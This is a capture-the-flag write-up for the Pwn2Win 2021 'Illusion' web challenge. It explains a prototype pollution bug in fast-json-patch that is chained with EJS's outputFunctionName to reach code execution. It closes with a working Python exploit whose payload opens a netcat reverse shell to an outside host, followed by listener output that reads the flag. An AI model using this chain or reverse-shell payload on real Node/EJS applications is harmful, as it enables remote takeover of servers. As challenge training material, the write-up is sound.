Pwn2Win 2021 - Illusion
Challenge Description
Illusion - web - 152 ptsLaura just found a website used for monitoring security mechanisms on Rhiza's state and is planning to hack into it to forge the status of these security services. After that she will desactivate these security resources without alerting government agents. Your goal is to get into the server to change the monitoring service behavior.Server: nc illusion.pwn2win.party 1337
illusion.tar.gz
13KB
Binary
Attachment
Writeup
First look
The challenge's attachment contains a source code of a website written in NodeJS.
1
❯ tree .
2
.
3
├── Dockerfile
4
├── entrypoint.sh
5
├── flag.txt
6
├── readflag
7
└── src
8
├── index.js
9
├── package-lock.json
10
├── package.json
11
├── static
12
│ └── style.css
13
└── templates
14
└── index.ejs
15
16
3 directories, 9 files
Copied!
Finding the bug
There is only a single javascript code file, so knowing where to look for the bug located is quite straightforward. The other files – e.g.
Dockerfile, entrypoint.sh – do not contain anything interesting.src/index.js (partial)
1
let services = {
2
status: "online",
3
cameras: "online",
4
doors: "online",
5
dome: "online",
6
turrets: "online"
7
}
8
9
app.get("/", async (req, res) => {
10
const html = await ejs.renderFile(__dirname + "/templates/index.ejs", {services})
11
res.end(html)
12
})
Copied!
The
index.js contains a web service using express and ejs to basically shows display a formatted javascript object service into table format on frontend.
The website
There is an interesting API function
/change_status that allows us to replace the property in JS object service to our inputted value using a library fast-json-patch. Something noteworthy is: there is no validation at all on the inputted values. This allow us to provide object {} instead of string.src/index.js (partial)
1
const jsonpatch = require('fast-json-patch')
2
3
app.post("/change_status", (req, res) => {
4
5
let patch = []
6
7
Object.entries(req.body).forEach(([service, status]) => {
8
9
if (service === "status"){
10
res.status(400).end("Cannot change all services status")
11
return
12
}
13
14
patch.push({
15
"op": "replace",
16
"path": "/" + service,
17
"value": status
18
})
19
});
20
21
jsonpatch.applyPatch(services, patch)
22
23
if ("offline" in Object.values(services)){
24
services.status = "offline"
25
}
26
27
res.json(services)
28
})
Copied!
Looking at the
fast-json-patch GitHub page, there is an open pull request fixing a prototype pollution bug. At this point, we already knows the bug, the rest is just to craft the exploit for RCE.Exploit
outputFunctionNameSet to a string (e.g.,'echo'or'print') for a function to print output inside scriptlet tags. -- https://ejs.co/
From quick googling with keywords "prototype pollution ejs", we can know that we can pollute prototype property
outputFunctionName in EJS to get RCE. So the idea is:- Using API, set the
service.camerasproperty into object{}. - Using API, set the
service.cameras.constructor.prototype.outputFunctionNameto our RCE reverse shell payload. - In our VPS, Setup listener using netcat for incoming reverse shell.
- GET the website to trigger EJS to execute our payload.
- Reverse shell obtained, then read flag.
1
import requests
2
3
'''
4
# inside vps:
5
6
[email protected]:~# nc -lvnp 8888
7
Listening on 0.0.0.0 8888
8
Connection received on 35.223.81.55 37939
9
10
whoami
11
guest
12
13
./readflag
14
CTF-BR{d0nt_miX_pr0totyPe_pol1ution_w1th_a_t3mplat3_3ng1nE!}
15
'''
16
17
url = 'http://illusion.pwn2win.party:14473'
18
password = 'jfuqpriqtshvbabn' # provided from the challenge
19
20
payload = "x;global.process.mainModule.require('child_process').exec('sh -c \"nc 1.2.3.4 8888 -e /bin/sh\"');x"
21
22
session = requests.Session()
23
session.auth = ('admin', password)
24
session.post(f'{url}/change_status', json={'cameras': {}})
25
session.post(f'{url}/change_status', json={
26
'cameras/constructor/prototype/outputFunctionName': payload
27
})
28
session.get(url)
Copied!
Flag
CTF-BR{d0nt_miX_pr0totyPe_pol1ution_w1th_a_t3mplat3_3ng1nE!}Last modified 11mo ago
Copy link